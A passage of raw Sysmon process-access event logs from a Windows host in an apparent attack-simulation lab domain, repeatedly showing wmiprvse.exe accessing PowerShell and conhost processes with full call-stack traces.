iPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151239Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151238Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151237Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151236Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151235Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151234Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151233Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151232Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151231Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151230Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151229Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151228Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151227Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151226Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151225Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151224Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.ex